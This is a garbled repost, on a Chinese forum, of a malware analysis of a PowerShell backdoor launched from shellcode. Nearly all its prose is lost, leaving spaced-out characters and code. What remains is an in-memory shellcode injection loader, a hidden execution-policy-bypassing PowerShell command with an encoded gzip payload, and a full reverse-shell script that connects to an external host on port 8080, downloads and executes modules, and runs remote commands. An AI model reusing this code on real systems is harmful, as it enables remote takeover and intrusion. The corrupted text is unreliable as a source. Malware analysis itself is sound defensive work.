搜索

[28627] 2020-10-09_从ShellCode启动PowerShell后门

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2020-10-09_从ShellCode启动PowerShell后门 S h e l l C o d e P o w e r S h e l l X a v i e r   M e r t e n s   O t s   2 0 2 0 - 1 0 - 0 9 I n t e r n e t 使 G i t H u b P o w e r S h e l l V T 8 / 5 9 使 使 C S h a r p   C o d e   P r o v i d e r   [   1   ] [   2   ] [   3   ] 1 .   V i r t u a l A l l o c P o w e r S h e l l   E x e c u t e R e a d W r i t e 0 x 4 0 2 .   S h e l l c o d e C o p y 3 .   C r e a t e T h r e a t 4 .   W a i t F o r S i n g l e O b j e c t s h e l l c o d e B a s e 6 4 S h e l l c o d e 使 W i n E x e c P o w e r S h e l l B a s e 6 4 s c d b g P o w e r S h e l l S H A 2 5 6 f 4 a 4 f f f a a 3 1 c 5 9 3 0 9 d 7 b b a 7 8 2 3 0 2 9 c b 2 1 1 a 1 6 b 3 b 1 8 7 f c b b 4 0 7 7 0 5 e 7 a 5 e 9 4 2 1 d 3 $ n T l W   =   N e w - O b j e c t   M i c r o s o f t . C S h a r p . C S h a r p C o d e P r o v i d e r $ c U j 0 x   =   N e w - O b j e c t   S y s t e m . C o d e D o m . C o m p i l e r . C o m p i l e r P a r a m e t e r s $ c U j 0 x . R e f e r e n c e d A s s e m b l i e s . A d d R a n g e ( @ ( " S y s t e m . d l l " ,   [ P s O b j e c t ] . A s s e m b l y . L o c a t i o n ) ) $ c U j 0 x . G e n e r a t e I n M e m o r y   =   $ T r u e $ z g A   =   $ n T l W . C o m p i l e A s s e m b l y F r o m S o u r c e ( $ c U j 0 x ,   $ d n ) $ f H 3 r I   =   [ y 5 S R . f u n c ] : : V i r t u a l A l l o c ( 0 ,   $ u 4 O . L e n g t h   +   1 ,   [ y 5 S R . f u n c + A l l o c a t i o n T y p e ] : : R e s e r v e   - b O r   [ y 5 S R . f u n c + A l l o c a t i o n T y p e ] : : C o m m i t ,   [ y 5 S R . f u n c + M e m o r y P r o t e c t i o n ] : : E x e c u t e R e a d W r i t e i f   ( [ B o o l ] ! $ f H 3 r I )   {   $ g l o b a l : r e s u l t   =   3 ;   r e t u r n   } [ S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s . M a r s h a l ] : : C o p y ( $ u 4 O ,   0 ,   $ f H 3 r I ,   $ u 4 O . L e n g t h ) [ I n t P t r ]   $ a y   =   [ y 5 S R . f u n c ] : : C r e a t e T h r e a d ( 0 , 0 , $ f H 3 r I , 0 , 0 , 0 ) i f   ( [ B o o l ] ! $ a y )   {   $ g l o b a l : r e s u l t   =   7 ;   r e t u r n   } $ p 0 v Z   =   [ y 5 S R . f u n c ] : : W a i t F o r S i n g l e O b j e c t ( $ a y ,   [ y 5 S R . f u n c + T i m e ] : : I n f i n i t e ) $   d o c k e r   r u n   - i t   - - r m   - v   $ ( p w d ) : / m a l w a r e   r o o t s h e l l / d s s u i t e   b a s e 6 4 d u m p . p y   f 4 a 4 f f f a a 3 1 c 5 9 3 0 9 d 7 b b a 7 8 2 3 0 2 9 c b 2 1 1 a 1 6 b 3 b 1 8 7 f c b b 4 0 7 7 0 5 e 7 a 5 e 9 4 2 1 d 3 . d m s   - n   1 0 0   - s   1   - S ; } $ u D $ $ [ [ a Y Z Q p o w e r s h e l l . e x e   - n o p   - w   h i d d e n   - n o n i   - e p   b y p a s s   " & ( [ s c r i p t b l o c k ] : : c r e a t e ( ( N e w - O b j e c t   S y s t e m . I O . S t r e a m R e a d e r ( N e w - O b j e c t   S y s t e m . I O . C o m p r e s s i o n . G z i p S t r e a m ( ( N e w - O b j e c t   S y s t e m . I O . M e m o r y S t r e a m ( , [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ' H 4 s I A D e X A V 8 C A 5 1 W W 2 / b N h R + 9 6 8 4 c L V a Q i x C C T C g C J B i r p J u A d L W q L z l w T A Q W j q O t c i k R l K + L P F / L y l R F 8 c J u k w v t s j D 7 3 z n O x f q H Y z 5 B s W i Y O D D r U i V Q g b z H X z S P 5 N C M B T w H i 7 p G u E P K p J d r 6 c t Y 5 V y B r + j 8 m 9 x H m c p M g W 9 x x 7 o x 9 n E c A F f c e N / m / + N s Q J / s s v x K 1 2 h X l R E 2 4 e l f W 1 M / p R 4 i Q t a Z C o U m O i d l G Z S Q z h K F N h Y j Q X f 7 s g z C 7 3 e W a l t e / u W Y l 6 H 1 n u E c n 9 M B V 2 5 1 f 9 p p E T K 7 m d O y F c r y p L h 4 W o k s 5 i z Z 4 u X f M M y T p N y 1 b O Y g s c o J V g B V j w p M j Q E f 3 M 9 q E z S B b i 1 G / D x H + j P U 5 b 0 v X K z O l e e z V K p 5 d e S X 2 i X O / 1 / R Y x q E Y 8 f U E k y i f M b a z H 7 E H w I j g 8 S q a h Q x q / 1 X O 7 a F F 1 0 7 E Z x j L n S g F U 6 3 I r K / j W 6 A t c o J B 4 z b q A 7 K X + J e T i 2 j v p 5 c v r v n L C s P z Q h W L + 9 S j u p B N K V I V r h E l 1 j U b m m C b b U q t R U z E y Z 9 G 0 m O r y k z K I a 7 B V q G B e 6 3 H c k q k 1 d 6 3 / o L H Q 9 4 d B 9 d C Y a f Q 8 + l T A 9 O P M d V 1 x h i E K l i z S m C v + i W Z p Q U 3 Q h z b I 5 j R 9 m n v c C H T I q 1 N J U r D k 0 k k e i e J 2 0 t W q 0 0 X T l m s 5 3 C q e z m W N + T c E F h J w F + n n 6 5 T H Y W 0 W R J f W 2 O 1 W 4 V Q R Z z B N T z e f n o y i 8 v v a M y p + M j d u / 1 W X J N 7 K a C d E S s w x E w Z i 2 B q 1 B I X V p 9 u E E H G T r c / P G T G O f 6 D W d j m Y j 5 q u 8 U O 3 m H Q t 5 v h P p / V K B G 3 p w F p z + C l / S W H D J F w p C L n I u S u 0 I j I x H Y y l B o H a w x o T c s T t m K 8 9 q Q s y g Q r e N b h g M 2 x d y g + x e L b s V U / d t t 2 a O S u Z t U k 1 P Z n C j I Y 0 2 t u d J w / P t X O t T n 7 m 4 o v F S c 6 5 A I W X N T G m t W t r m c Q 9 G s U f q a K u p V S N 5 T 9 d s z R / Q v 9 r m W l u p 9 W 5 Q 9 o d t + C Y l B u M I B j r P J Y s b H p e Z 9 M i Y q q V e H X w c / O / U b Z Z p h q 7 r p G U P V M e / I 0 3 c q u K H E A z B O T j n g c 8 Q g q P c X h n 6 m E x 0 K K 9 d T 3 Y 0 G B N S h n h l Q 2 5 R d I N T Q 6 W D Z i d U K X M d D j i p 9 6 y s 9 D w w W h 4 l A P x 6 z F b g Z x / f n 8 I T f C u U X 6 G C l e I A 6 g x K Q W p g L f J P U g C D F m R r i D g o B B f T Y H b g r M O 6 3 C d x h l S 4 3 k s M L r o v u v G 3 v e N O + k / l 0 8 L 8 t H W 6 p X L U O P W Z z 1 k h l 8 3 N a 8 e g v U 7 C j E u 0 8 b R 3 Y a R 4 X l + A + u u h 1 3 w 1 N M m x 1 x / 4 9 u Y x A + Q H 7 W z a 3 j k J A A A = ' ) ) ) , [ S y s t e m . I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ) ) " #   P o w e r f u n   -   W r i t t e n   b y   B e n   T u r n e r   &   D a v e   H a r d y f u n c t i o n   G e t - W e b c l i e n t   {         $ w c   =   N e w - O b j e c t   - T y p e N a m e   N e t . W e b C l i e n t
g i t h u b . c o m d a v e h a r d y 2 0   /   P o w e r S h e l l - S c r i p t s   [   4   ] P o w e r S h e l l P o w e r S h e l l V T X a v i e r   M e r t e n s @ x m e I S C -         $ w c . U s e D e f a u l t C r e d e n t i a l s   =   $ t r u e         $ w c . P r o x y . C r e d e n t i a l s   =   $ w c . C r e d e n t i a l s         $ w c } f u n c t i o n   p o w e r f u n   {           P a r a m (           [ S t r i n g ] $ C o m m a n d ,         [ S t r i n g ] $ S s l c o n ,         [ S t r i n g ] $ D o w n l o a d         )           P r o c e s s   {         $ m o d u l e s   =   @ ( )             i f   ( $ C o m m a n d   - e q   " b i n d " )         {                 $ l i s t e n e r   =   [ S y s t e m . N e t . S o c k e t s . T c p L i s t e n e r ] 8 0 8 0                 $ l i s t e n e r . s t a r t ( )                         $ c l i e n t   =   $ l i s t e n e r . A c c e p t T c p C l i e n t ( )         }           i f   ( $ C o m m a n d   - e q   " r e v e r s e " )         {                 $ c l i e n t   =   N e w - O b j e c t   S y s t e m . N e t . S o c k e t s . T C P C l i e n t ( " p d 1 z b [ . ] n l " , 8 0 8 0 )         }         $ s t r e a m   =   $ c l i e n t . G e t S t r e a m ( )         i f   ( $ S s l c o n   - e q   " t r u e " )           {                 $ s s l S t r e a m   =   N e w - O b j e c t   S y s t e m . N e t . S e c u r i t y . S s l S t r e a m ( $ s t r e a m , $ f a l s e , ( { $ T r u e }   - a s   [ N e t . S e c u r i t y . R e m o t e C e r t i f i c a t e V a l i d a t i o n C a l l b a c k ] ) )                 $ s s l S t r e a m . A u t h e n t i c a t e A s C l i e n t ( " p d 1 z b [ . ] n l " )                   $ s t r e a m   =   $ s s l S t r e a m           }         [ b y t e [ ] ] $ b y t e s   =   0 . . 2 0 0 0 0 | % { 0 }         $ s e n d b y t e s   =   ( [ t e x t . e n c o d i n g ] : : A S C I I ) . G e t B y t e s ( " W i n d o w s   P o w e r S h e l l   r u n n i n g   a s   u s e r   "   +   $ e n v : u s e r n a m e   +   "   o n   "   +   $ e n v : c o m p u t e r n a m e   +   " ` n C o p y r i g h t   ( C )   2 0 1 5   M i c r o s o f t   C o r p o r a t i o n .   A l l   r i g h t s   r e s e r v e d . ` n ` n "         $ s t r e a m . W r i t e ( $ s e n d b y t e s , 0 , $ s e n d b y t e s . L e n g t h )         i f   ( $ D o w n l o a d   - e q   " t r u e " )         {                 $ s e n d b y t e s   =   ( [ t e x t . e n c o d i n g ] : : A S C I I ) . G e t B y t e s ( " [ + ]   L o a d i n g   m o d u l e s . ` n " )                 $ s t r e a m . W r i t e ( $ s e n d b y t e s , 0 , $ s e n d b y t e s . L e n g t h )                 F o r E a c h   ( $ m o d u l e   i n   $ m o d u l e s )                 {                         ( G e t - W e b c l i e n t ) . D o w n l o a d S t r i n g ( $ m o d u l e ) | I n v o k e - E x p r e s s i o n                 }         }         $ s e n d b y t e s   =   ( [ t e x t . e n c o d i n g ] : : A S C I I ) . G e t B y t e s ( ' P S   '   +   ( G e t - L o c a t i o n ) . P a t h   +   ' > ' )         $ s t r e a m . W r i t e ( $ s e n d b y t e s , 0 , $ s e n d b y t e s . L e n g t h )         w h i l e ( ( $ i   =   $ s t r e a m . R e a d ( $ b y t e s ,   0 ,   $ b y t e s . L e n g t h ) )   - n e   0 )         {                 $ E n c o d e d T e x t   =   N e w - O b j e c t   - T y p e N a m e   S y s t e m . T e x t . A S C I I E n c o d i n g                 $ d a t a   =   $ E n c o d e d T e x t . G e t S t r i n g ( $ b y t e s , 0 ,   $ i )                 $ s e n d b a c k   =   ( I n v o k e - E x p r e s s i o n   - C o m m a n d   $ d a t a   2 > & 1   |   O u t - S t r i n g   )                 $ s e n d b a c k 2     =   $ s e n d b a c k   +   ' P S   '   +   ( G e t - L o c a t i o n ) . P a t h   +   ' >   '                 $ x   =   ( $ e r r o r [ 0 ]   |   O u t - S t r i n g )                 $ e r r o r . c l e a r ( )                 $ s e n d b a c k 2   =   $ s e n d b a c k 2   +   $ x                 $ s e n d b y t e   =   ( [ t e x t . e n c o d i n g ] : : A S C I I ) . G e t B y t e s ( $ s e n d b a c k 2 )                 $ s t r e a m . W r i t e ( $ s e n d b y t e , 0 , $ s e n d b y t e . L e n g t h )                 $ s t r e a m . F l u s h ( )             }         $ c l i e n t . C l o s e ( )         $ l i s t e n e r . S t o p ( )         } } p o w e r f u n   - C o m m a n d   r e v e r s e   - S s l c o n   t r u e [ 1 ]     h t t p s : / / d o c s . m i c r o s o f t . c o m / z h - c n / d o t n e t / a p i / m i c r o s o f t . c s h a r p . c s h a r p c o d e p r o v i d e r ? v i e w = d o t n e t - p l a t - e x t - 3 . 1 [ 2 ]     h t t p s : / / i s c . s a n s . e d u / f o r u m s   /   d i a r y   /   M a l i c i o u s   +   P o w e r S h e l l   +   C o m p i l i n g   +   C   +   C o d e   +   o n   +   t h e   +   F l y   /   2 4 0 7 2 [ 3 ]     h t t p s : / / i s c . s a n s . e d u / f o r u m s / d i a r y / M a l w a r e + S a m p l e s + C o m p i l i n g + T h e i r + N e x t + S t a g e + o n   +   P r e m i s e   /   2 5 2 7 8 [ 4 ]     h t t p s : / / g i t h u b . c o m / d a v e h a r d y 2 0 / P o w e r S h e l l - S c r i p t s
  -   h t t p s : / / i s c . s a n s . e d u / f o r u m s / d i a r y / P o w e r S h e l l + B a c k d o o r + L a u n c h e d + f r o m + a + S h e l l C o d e / 2 6 6 0 2 /         -  
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理